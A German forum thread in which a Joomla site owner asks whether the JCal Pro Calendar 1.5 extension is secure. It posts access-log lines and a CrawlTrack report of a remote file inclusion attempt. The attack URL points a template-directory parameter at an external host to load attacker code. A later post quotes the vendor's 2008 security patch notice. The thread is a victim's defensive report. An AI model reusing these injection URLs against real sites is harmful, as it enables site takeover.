Thema: JCal Pro Calendar 1.5 sicher?

Zitat von GeoB

Also ich hab jetzt mal das Script von Bot-Trap
eingebaut mal sehn was passiert.

Bin ich der einzige hat keiner ähnliche Probleme mit JCal Pro 1.5 ?

Bot-Trap scheint mein Problem zu lösen, seitdem ich den Mambot und das Script
eingebaut habe.

.

Hallo,

bin den Angriffen immer noch auf der Spur und setze wie gesagt Bot-Trap und nun noch zusätzlich CrawlTrack ein.

Der letzte Angriff heute Nacht mit folgendem Log und Bericht:

Log:
xxx.xxx.xxx.xxx - - [02/Nov/2007:03:47:09 +0100] "GET /index.php?option=com_jcalp...=30&extmode=extcal_search/includes/search.php?GlobalSettings[templatesDirectory]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 302 47875 www.meinedomain.com "-" "libwww-perl/5.808" "-"

xxx.xxx.xxx.xxx - - [02/Nov/2007:03:47:09 +0100] "GET /crawltrack2-3-0/html/noacces.htm HTTP/1.1" 200 397 www.meinedomain.com"-" "libwww-perl/5.808" "-"
noacces.htm ist die Fehlermeldung an den Angreifer zurück und lautet:This site is protected by CrawlTrack !!! Your visit has been detected as a hacking attempt.
Wird zwar keinen abhalten aber dennoch.........

xxx.xxx.xxx.xxx - - [02/Nov/2007:03:47:09 +0100] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 200 619 www.meinedomain.com "-" "libwww-perl/5.808" "-"

Bericht in CrawlTrack:
Es koennte ein Risiko bestehen, wenn Sie eines folgender Scripte nutzen:

Parameter genutzt fuer code injection Versuche:
extmode=

Datei / Script, welches der Hacker hochladen wollte:
extcal_search/includes/search.php?GlobalSettings[templatesDirectory]=http://www.superlab.jazztel.es/safe.gif?

URL(s) des Angriffs:
/index.php?option=com_jcalp...=30&extmode=extcal_search/includes/search.php?GlobalSettings[templatesDirectory]=http://www.superlab.jazztel.es/safe.gif?

Mir ist bekannt libwww-perl/5.808 wird durch BotTrap geblockt aber....

Warum kann mich nicht dieser Hacker angreifen: http://www.stophiphop.com:80/news/184.html ........Scherz beiseite die Sache ist ernst.

Gruß GeoB

Hallo,

jetzt ist ja fast ein Jahr vorbei seitdem ich JCal Pro Calendar 1.5 für Joomla 1.0.x deinstalliert habe.
Ein erneuter Besuch bei "http://dev.anything-digital.com/Blog" liefert
folgende News vom 06 August 2008:

Security patch available for JCal Pro - Joomla! 1.0 only

Through the persistence of users ‘XXXXX’ and ‘XXXXX’, we identified
a few low-level security issues affecting JCal Pro for
Joomla! 1.0.x (versions 1.5.3, 1.5.3.1 and 1.5.3.2 only).
A free patch is available to fix these bugs (login required),
though we recommend that all users of JCal Pro for Joomla! 1.0.x
upgrade to the latest version, 1.5.3.5.

Übersetzt heist das wohl:

Durch die Hartnäckigkeit der Nutzer "XXXXX" und "XXXXX" haben wir festgestellt, das es
Low-Level-Sicherheitsfragen gibt, die sich auf JCal Pro für Joomla! 1.0.x
(Versionen 1.5.3, 1.5.3.1 und 1.5.3.2) beziehen.
Ein kostenloser Patch steht zur Verfügung, um diese Fehler
zu beheben (Login erforderlich), wir empfehlen allen Nutzern
von JCal Pro für Joomla! 1.0.x ein Upgrade auf die neueste Version 1.5.3.5.

Mittlerweile bieten die bereits diese Version an:
1.5.3.6 Stable for Joomla 1.0.x and Mambo 4.6.2

Meine Befürchtungen haben sich irgendwie doch bestätigt !!!